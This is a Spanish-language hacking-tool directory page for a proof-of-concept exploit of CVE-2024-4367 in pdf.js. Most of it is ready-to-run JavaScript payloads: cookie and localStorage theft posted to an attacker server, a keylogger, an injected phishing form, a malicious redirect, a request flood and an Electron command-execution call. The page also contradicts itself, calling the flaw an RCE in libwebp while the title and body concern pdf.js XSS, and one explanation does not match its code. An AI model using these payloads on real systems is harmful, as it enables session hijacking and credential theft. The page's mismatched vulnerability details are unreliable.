Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/elamani-drawing/cve-2024-4367-poc-pdfjs
Herramientas de PhishingGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebExfiltración de DatosIngeniería SocialAprendizaje y Educación
GitHubelamani-drawing/cve-2024-4367-poc-pdfjs

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-4367-POC-PDFJS

PoC (Proof of Concept) para CVE-2024-4367 - Vulnerabilidad RCE en libwebp. Demostración completa que incluye: creación de payloads, escenarios de ataque, análisis de riesgos y servidor Express.js de prueba.

Ver Repositorio
16hace 1 añoAún no revisado

CVE 2024 4367: PoC para la explotación de XSS (Cross-Site Scripting)

1. Mostrar una Alerta (Desencadenamiento XSS)

Otro ejemplo de explotación consiste en inyectar un simple mensaje de alerta para verificar si el ataque funciona.

root@kitploit:~
python poc.py "alert('XSS exploit triggered');"
  • Explicación : Este código inyecta una ventana emergente de alerta en la página, lo que permite probar rápidamente si el exploit XSS se ejecuta en el sitio objetivo.

2. Robo de Cookies

El ataque XSS puede usarse para robar las cookies de la víctima y enviarlas a un servidor malicioso.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/cookie', {method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cookie: document.cookie})});"
  • Explicación : El script modifica la URL de la página para incluir las cookies de la víctima, que luego se envían a un servidor malicioso (http://localhost:3000/cookie).

3. Robo de Datos Almacenados Localmente (LocalStorage)

El atacante puede robar información sensible almacenada en el localStorage de la víctima, como datos de autenticación o información de sesión.

root@kitploit:~
python poc.py "fetch('http://localhost:3000/localstorage', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({localstorage: JSON.stringify(localStorage)})});"
  • Explicación : El código recupera los datos sensibles almacenados en el localStorage y los envía a un servidor malicioso mediante una solicitud fetch.

4. Redirección Maliciosa

El atacante puede redirigir a la víctima a un sitio malicioso para recuperar información adicional o cargar otro exploit.

root@kitploit:~
python poc.py "window.location.href='http://localhost:3000';"
  • Explicación : Este script redirige inmediatamente a la víctima a un sitio malicioso, lo que puede usarse en ataques de phishing o para instalar software malicioso.

5. Ataque por DDoS (Inundación de API)

Otro tipo de ataque consiste en inundar un servidor con solicitudes, lo que puede provocar una degradación del rendimiento o una interrupción del servicio.

root@kitploit:~
python poc.py  "for (let i = 0; i < 100; i++) { fetch('http://localhost:3000/api'); }"
  • Explicación : El script envía 100 solicitudes HTTP a una API objetivo, lo que puede provocar una sobrecarga del servidor (ataque de denegación de servicio).

6. Keylogger (Robo de pulsaciones de teclado)

El atacante puede interceptar las pulsaciones de teclado de la víctima, lo que le permite recuperar información sensible como contraseñas o identificadores.

root@kitploit:~
python poc.py """document.addEventListener('keydown', function(e) {
    fetch('http://localhost:3000/keylogger?key=' + e.key);
});"""
  • Explicación : Este script registra cada tecla presionada por la víctima y envía esta información a un servidor malicioso.

7. Phishing mediante Formulario Inyectado (Robo de datos sensibles)

Un atacante puede usar XSS para inyectar un formulario de phishing en una página web y así robar información sensible (ej.: contraseña, nombre de usuario).

root@kitploit:~
python poc.py """
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:3000/phishing';
var input = document.createElement('input');
input.type = 'text';
input.name = 'username';
form.appendChild(input);
document.body.appendChild(form);
form.submit();
"""
  • Explicación : Este código inyecta un formulario en la página, permitiendo al atacante recuperar información sensible que el usuario envía a través de este formulario de phishing.

8. Suplantación

Si el usuario va a hacer clic en un botón de descarga, cambiaremos el destino de la descarga.

root@kitploit:~
const a = document.createElement('a');
a.href = "https://example.com/fichier.pdf";
a.download = "fichier.pdf"; 
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
  • Explicación : Este script actualiza el enlace de una URL de descarga; la idea es modificar un botón existente para que descargue un archivo malicioso en lugar del previsto por el usuario.

9. Ataques en Aplicaciones de Escritorio (Electron, NW.js)

root@kitploit:~
python poc.py "require('child_process').exec('calc.exe')"

Las aplicaciones basadas en frameworks como Electron o NW.js también pueden verse afectadas por ataques XSS, ya que permiten integrar contenido web en aplicaciones de escritorio con accesos locales ampliados.
Estas aplicaciones, debido a sus permisos, pueden permitir a un atacante acceder a archivos locales, ejecutar procesos externos, o incluso lanzar otras aplicaciones en la máquina objetivo (por ejemplo, la calculadora, un editor de texto, etc.). Esto aumenta considerablemente la superficie de ataque, ya que estas aplicaciones combinan el poder de la web con accesos al sistema más amplios.


Conclusión

Los ataques que explotan las CVE (Common Vulnerabilities and Exposures) pueden permitir realizar diversos tipos de ataques XSS. Al explotar vulnerabilidades específicas en aplicaciones web o de escritorio, un atacante puede inyectar código malicioso, robar información sensible, manipular sesiones de usuario o ejecutar acciones maliciosas en el sistema objetivo.

Descargar herramienta